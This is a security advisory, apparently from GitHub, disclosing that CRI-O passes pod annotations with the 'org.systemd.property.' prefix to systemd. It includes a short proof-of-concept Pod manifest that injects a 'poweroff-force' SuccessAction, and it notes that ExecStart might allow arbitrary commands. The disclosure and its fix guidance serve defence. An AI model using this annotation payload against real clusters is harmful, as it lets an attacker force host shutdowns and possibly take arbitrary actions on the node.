Impact
On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:
---
apiVersion: v1
kind: Pod
metadata:
name: poc-arbitrary-systemd-property-injection
annotations:
# I believe that ExecStart with an arbitrary command works here too,
# but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
containers:
- name: hello
image: [quay.io/podman/hello](http://quay.io/podman/hello)
This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.
Tested with CRI-O v1.24 on minikube.
I didn't test the latest v1.29 because it is incompatible with minikube: kubernetes/minikube#18367
Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations:
opencontainers/runc#3923 (comment)
CRI-O has to filter out annotations that have the prefix "org.systemd.property."
See also:
Workarounds
Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations
References
References
AkihiroSuda Reporter
cclerget Finder
Impact
On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:
This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.
Tested with CRI-O v1.24 on minikube.
I didn't test the latest v1.29 because it is incompatible with minikube: kubernetes/minikube#18367
Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations:
opencontainers/runc#3923 (comment)
CRI-O has to filter out annotations that have the prefix "org.systemd.property."
See also:
Workarounds
Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations
References
References